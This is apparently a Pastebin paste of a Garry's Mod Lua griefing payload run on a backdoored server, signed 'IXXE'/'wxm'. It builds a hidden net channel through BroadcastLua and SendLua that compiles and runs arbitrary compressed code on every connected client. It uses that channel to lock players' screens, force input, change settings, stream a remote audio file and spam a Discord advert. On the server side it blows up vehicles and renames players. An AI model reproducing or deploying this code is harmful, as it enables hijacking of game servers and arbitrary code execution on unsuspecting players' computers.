Advertisement
Guest User

Untitled

a guest
Jul 16th, 2019
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.82 KB | None | 0 0
  1. --[[
  2. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  3. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  4. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  5. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  6. ]]--
  7.  
  8.  
  9. print([=[
  10. wxm get rekt ;)
  11. ]=])
  12.  
  13.  
  14. for k, v in pairs( player.GetAll() ) do
  15. if ( v:Alive() ) then
  16. v:GodEnable()
  17. else
  18. v:Spawn()
  19. timer.Simple( 1.2, function()
  20. v:GodEnable()
  21. end)
  22. end
  23. end
  24.  
  25.  
  26. local function rdm_str(len)
  27. if !len or len <= 0 then return '' end
  28. return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
  29. end
  30.  
  31. local net_string = rdm_str(25)
  32.  
  33. util.AddNetworkString(net_string)
  34. BroadcastLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  35. hook.Add("PlayerInitialSpawn", "☂️_PRIVATE_JOKE",function(ply)
  36. if !ply:IsBot() then
  37. ply:SendLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  38. end
  39. end)
  40.  
  41. local function SendToClient(code)
  42. local data = util.Compress(code)
  43. local len = #data
  44. net.Start(net_string)
  45. net.WriteUInt(len, 16)
  46. net.WriteData(data, len)
  47. net.Broadcast()
  48. end
  49. timer.Simple( 17, function()
  50. SendToClient([[
  51. print([=[
  52. wxm get rekt ;)
  53. ]=])
  54. hook.Add("Think","🤔_WHY_YOU_WANT_EDIT_MY_CODE",function() gui.HideGameUI() end)
  55. local CreateModel = function(mdl, isragdoll)
  56. local ent
  57. if isragdoll then
  58. ent = ClientsideRagdoll(mdl)
  59. else
  60. ent = ClientsideModel(mdl, RENDERGROUP_OTHER)
  61. end
  62.  
  63.  
  64. return ent
  65. end
  66. local NewHookAdd = function(str, name, func)
  67. --name = "dronesrewrite_hell_hooks" .. name
  68. hook.Add(str, name, func)
  69.  
  70. table.insert(cache, {
  71. str = str,
  72. name = name
  73. })
  74. end
  75. local cache = { }
  76. timercache = { }
  77. local Const = 0
  78. local Noise = nil
  79. local pl = LocalPlayer()
  80. timer.Create("💸_BUY_GVAC_NOW", 2, 1, function()
  81. local dlight = DynamicLight(pl:EntIndex())
  82. if dlight then
  83. dlight.pos = Vector(-2224.216797, -2918.063721, 2354.03125)
  84. dlight.r = 255
  85. dlight.g = 0
  86. dlight.b = 0
  87. dlight.brightness = 16
  88. dlight.Decay = 1000
  89. dlight.Size = 2000
  90. dlight.DieTime = CurTime() + 2
  91. end
  92. local pos = pl:GetPos() + Vector(0, 0, 120)
  93. local ang = Angle(0, pl:GetAngles().y, 0)
  94. local tr = util.TraceLine({
  95. start = pos,
  96. endpos = pos + ang:Forward() * 86,
  97. filter = pl
  98. })
  99. local rag_pos = tr.HitPos + tr.HitNormal * 3 - Vector(0, 0, 80)
  100. for i = 1, 16 do
  101. sound.Play("vo/npc/Barney/ba_laugh04.wav", Vector( 0, 0, 0 ) )
  102. end
  103. local mdl = CreateModel("models/food/hotdog.mdl")
  104. mdl:SetModelScale(5)
  105. mdl:SetAngles(ang + Angle(15, 180, 0))
  106. mdl:SetPos(rag_pos)
  107. mdl:Spawn()
  108. hook.Add("CalcView", "😕_EDIT_MY_CODE_IS_STUPID", function(ply, _pos, _ang, fov)
  109. local view = { }
  110. view.origin = pos + VectorRand()
  111. view.angles = ang
  112. view.fov = fov + math.random(-80, -50)
  113.  
  114. return view
  115. end)
  116.  
  117. timer.Create("👻_WHY_ME_PLEASE_LEAK_GIZEH", 1.4, 1, function()
  118. mdl:Remove()
  119. hook.Remove("CalcView", "😕_EDIT_MY_CODE_IS_STUPID")
  120. end)
  121. end)
  122. ]])
  123. end)
  124.  
  125. timer.Simple( 20, function()
  126. timer.Create( "ouupsss", 0.1, 0, function()
  127. for k,v in pairs(player.GetAll()) do
  128. v:SendLua('RunConsoleCommand("impulse","100")')
  129. end
  130. end)
  131. hook.Add( 'SetupMove', '😈_NO_SCOPED', function( ply, move )
  132. if not ply:IsOnGround() then
  133. move:SetButtons( bit.band( move:GetButtons(), bit.bnot( IN_JUMP ) ) )
  134. end
  135. end )
  136. for k, v in pairs(ents.GetAll()) do if v:IsVehicle() then
  137.  
  138. local explo = ents.Create("env_explosion")
  139. explo:SetPos(v:GetPos())
  140. explo:SetKeyValue("iMagnitude", "300")
  141. explo:Spawn()
  142. explo:Activate()
  143. explo:Fire("Explode", "", 0)
  144. end
  145.  
  146. end
  147. for k,v in pairs(player.GetAll()) do
  148. local a = v:LookupBone("ValveBiped.Bip01_Head1")
  149. local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
  150. local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
  151. local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
  152. local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
  153. local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
  154. local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
  155. local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
  156. local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
  157. local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
  158. local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
  159. v:ManipulateBoneScale( a, Vector(100,100,100))
  160. v:ManipulateBoneScale( b, Vector(100,100,100))
  161. v:ManipulateBoneScale( c, Vector(100,100,100))
  162. v:ManipulateBoneScale( d, Vector(100,100,100))
  163. v:ManipulateBoneScale( e, Vector(100,100,100))
  164. v:ManipulateBoneScale( f, Vector(100,100,100))
  165. v:ManipulateBoneScale( g, Vector(100,100,100))
  166. v:ManipulateBoneScale( h, Vector(100,100,100))
  167. v:ManipulateBoneScale( i, Vector(100,100,100))
  168. v:ManipulateBoneScale( j, Vector(100,100,100))
  169. v:ManipulateBoneScale( k, Vector(100,100,100))
  170. end
  171. SendToClient([[
  172. surface.CreateFont( "1XX3_big_text",{
  173. font = "Open Sans",
  174. size = 500,
  175. weight = 1000,
  176. antialias = true
  177. })
  178. surface.CreateFont("Marlow", {
  179. font = "Open Sans",
  180. size = ScrW()*0.02,
  181. weight = 10,
  182. blursize = 0,
  183. scanlines = 2.5,
  184. antialias = false
  185. })
  186. local function UwU_text( a )
  187.  
  188. local r = 0.5*math.sin(RealTime()*5.5)*255 + 255/2
  189. local g = -0.5*math.sin(RealTime()*5.5)*255 + 255/2
  190. local b = 215
  191.  
  192. return Color( r, g, b, a or 255 )
  193.  
  194. end
  195. local w,h = ScrW(), ScrH()
  196. local W, H = ScrW(), ScrH()
  197. local MySelf = LocalPlayer()
  198.  
  199. if ohno then
  200. ohno:Remove()
  201. ohno = nil
  202. end
  203.  
  204. ohno = vgui.Create( "DFrame" )
  205. ohno:SetSize( w, h )
  206. ohno:SetPos(0,0)
  207. ohno:SetDraggable ( false )
  208. ohno:SetTitle("")
  209. ohno:MakePopup();
  210. ohno:ShowCloseButton(false)
  211. ohno.Paint = function( self )
  212. Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  213. Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  214. end
  215.  
  216. local pw, ph = w, h*0.6
  217. local px, py = w/2-pw/2, h/2-ph/2
  218.  
  219. local Close = vgui.Create( "DButton", ohno )
  220. Close:SetPos(px, py)
  221. Close:SetText( "" )
  222. Close:SetSize( pw, ph )
  223. Close.Paint = function( self, tw, th )
  224.  
  225. local shift = math.sin(RealTime()*3)*1.5 + 5
  226.  
  227. draw.SimpleText( "wxm", "1XX3_big_text", tw/2 , th/2, UwU_text( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  228. draw.SimpleText( "wxm", "1XX3_big_text", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  229. draw.DrawText( "(╯°□°)╯︵ ┻━┻ wxm", "Marlow", ScrW() * 0.5, ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), TEXT_ALIGN_CENTER )
  230. draw.DrawText( "(╯°□°)╯︵ ┻━┻", "Marlow", math.random(0,10), ScrH() * (math.random(0,100)*0.01), Color( 240, 100, 100, math.random(230,255) ), 0 )
  231. draw.DrawText( "https://discord.gg/n8Heezw", "Marlow", W * 0.7 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  232. draw.DrawText( "wxm", "Marlow", W * 0.38 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  233. draw.DrawText( "https://discord.gg/n8Heezw", "Marlow", W * 0.9 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  234. draw.DrawText( "wxm", "Marlow", W * 0.35 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  235. draw.DrawText( "RIP ;)", "Marlow", W * 0.98 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  236. draw.DrawText( "wxm", "Marlow", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  237. draw.DrawText( "RIP ;)", "Marlow", W * 0.73 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  238. draw.DrawText( "wxm", "Marlow", W * 0.27 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  239. draw.DrawText( "wxm", "Marlow", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  240. draw.DrawText( "RIP ;)", "Marlow", W * 0.05 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  241. draw.DrawText( "wxm", "Marlow", W * 0.11 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  242. draw.DrawText( "https://discord.gg/n8Heezw", "Marlow", W * 0.75 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  243. draw.DrawText( "https://discord.gg/n8Heezw", "Marlow", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  244. draw.DrawText( "RIP ;)", "Marlow", W * 0.2 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  245. draw.DrawText( "wxm", "Marlow", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  246. draw.DrawText( "wxm", "Marlow", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  247. draw.DrawText( "wxm", "Marlow", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  248. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  249. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  250. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  251. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  252. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  253. end
  254. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  255. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  256. timer.Create("🥵_MENU_LUA_IS_DEAD_BUY_GVAC", 0.1, 0, function()
  257. util.ScreenShake( Vector(0,0,0), 2.5, 50, 0.5, 5000 )
  258. end)
  259. timer.Simple( 15, function()
  260. wut = vgui.Create( "DFrame" )
  261. wut:SetSize( w, h )
  262. wut:SetPos(0,0)
  263. wut:SetDraggable ( false )
  264. wut:SetTitle("")
  265. wut:ShowCloseButton(false)
  266. wut.Paint = function( self )
  267. surface.SetDrawColor(30, 30, 30, 0)
  268. end
  269. local Close = vgui.Create( "DButton", wut )
  270. Close:SetPos(px, py)
  271. Close:SetText( "" )
  272. Close:SetSize( pw, ph )
  273. Close.Paint = function( self, tw, th )
  274.  
  275. local shift = math.sin(RealTime()*3)*1.5 + 5
  276.  
  277. draw.SimpleText( "wxm", "1XX3_big_text", tw/2 , th/2, UwU_text( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  278. draw.SimpleText( "wxm", "1XX3_big_text", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  279. end
  280. RunConsoleCommand("r_shader_srgb","1")
  281. RunConsoleCommand("gmod_language","ko")
  282. ohno:Remove()
  283. ohno = nil
  284. local name = GetConVar("sv_skyname"):GetString()
  285. if name == "painted" then
  286. local sky
  287. for _, v in ipairs(ents.GetAll()) do
  288. if v:GetClass() == "env_skypaint" then
  289. sky = v
  290. break
  291. end
  292. end
  293. if !IsValid(sky) then return end
  294. hook.Add("PostRender","☁️_RAINBOW",function()
  295. local col = HSVToColor(CurTime()*30 % 360,1,1)
  296. col = Vector(col.r/255,col.g/255,col.b/255)
  297. sky:SetTopColor(col)
  298. sky:SetBottomColor(col)
  299. end)
  300. else
  301. local prefix = {"lf","ft","rt","bk","dn","up"}
  302. local mats = {}
  303. for i=1,6 do
  304. mats[#mats+1] = Material("skybox/" .. name .. prefix[i])
  305. end
  306. hook.Add("PostRender","☁️_RAINBOW",function()
  307. local col = HSVToColor(CurTime()*30 % 360,1,1)
  308. for i=1,6 do
  309. mats[i]:SetVector("$color",Vector(col.r/255,col.g/255,col.b/255))
  310. end
  311. end)
  312. end
  313. local chienchaud = ClientsideModel("models/food/hotdog.mdl")
  314. chienchaud:SetNoDraw(true)
  315. chienchaud:SetModelScale(120)
  316. timer.Create("☄️_LOOK_THE_SKY", 0.01, 0, function()
  317. chienchaud:SetAngles(Angle(0, CurTime()*90 % 360 ,180) )
  318. end)
  319.  
  320. local data = {}
  321. local function genchienchaud(id)
  322. local pos = LocalPlayer():GetPos()
  323. data[id] = { Vector(math.random(pos.x-9000,pos.x+9000),math.random(pos.y-9000,pos.y+9000),pos.z + math.random(5000,2000) ), math.random(70, 170) }
  324. end
  325. for i=1, 150 do
  326. genchienchaud(i)
  327. end
  328. hook.Add("PostDrawOpaqueRenderables","🌭_CHIEN_CHAUD",function()
  329. local z = LocalPlayer():GetPos().z
  330. for i=1, #data do
  331. chienchaud:SetPos(data[i][1])
  332. chienchaud:SetupBones()
  333. chienchaud:DrawModel()
  334. data[i][1].z = data[i][1].z - data[i][2] / 20
  335. if data[i][1].z <= z then
  336. genchienchaud(i)
  337. end
  338. end
  339. end)
  340. end )
  341. sound.PlayURL( "http://gm.esy.es/ijfjFJlfnLJFfd.mp3", "mono noblock noplay", function( station )
  342. timer.Simple( 0.1, function()
  343. ClientStation = station
  344. station:EnableLooping( true )
  345. station:Play()
  346. station:SetVolume( 1 )
  347. end )
  348. end )
  349. timer.Create("🔒", 0.11, 0, function()
  350. RunConsoleCommand("+attack")
  351. end)
  352. timer.Create("🔓", 0.12, 0, function()
  353. RunConsoleCommand("-attack")
  354. end)
  355. ]])
  356. end)
  357.  
  358. local you = "💸_BUY_GVAC"
  359.  
  360. timer.Simple( 20, function()
  361.  
  362. membresenigma =
  363. {
  364. "IXXE",
  365. "wxm",
  366. "wxm",
  367. "wxm",
  368. "wxm",
  369. "wxm",
  370. "wxm",
  371. "wxm",
  372. "wxm",
  373. "wxm",
  374. "wxm",
  375. "wxm",
  376. "wxm",
  377. "wxm",
  378. "wxm",
  379. "wxm",
  380. "wxm",
  381. "wxm",
  382. "wxm",
  383. "Greetz: IXXE"
  384. }
  385.  
  386. timer.Create( "🦠_NE_DEL_RIEN_SINON_CANCER", 0.2, 0, function()
  387. for k, ply in pairs( player.GetAll() ) do
  388. DarkRP.notify(ply, 2, 2, "[OUH!] "..table.Random(membresenigma).."")
  389. end
  390. end)
  391.  
  392.  
  393. for k,v in pairs(player.GetAll()) do
  394. v:SetRunSpeed(400* 4);
  395. v:SetWalkSpeed(400 * 4);
  396. end
  397.  
  398.  
  399. timer.Create( "🤫_RIP_U_VAC_BANNED", 1, 0, function()
  400. for k,v in pairs(player.GetAll()) do
  401. v:GodEnable()
  402. v:setDarkRPVar( "rpname", "wxm @ https://discord.gg/n8Heezw" )
  403. end
  404.  
  405. end )
  406.  
  407. end)
  408.  
  409.  
  410. timer.Create( "🤤_SPAM", 0, 0, function()
  411. SendToClient([[print("wxm la backdoor du futur")]])
  412. print("No rage ton serveur est backdoored")
  413. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement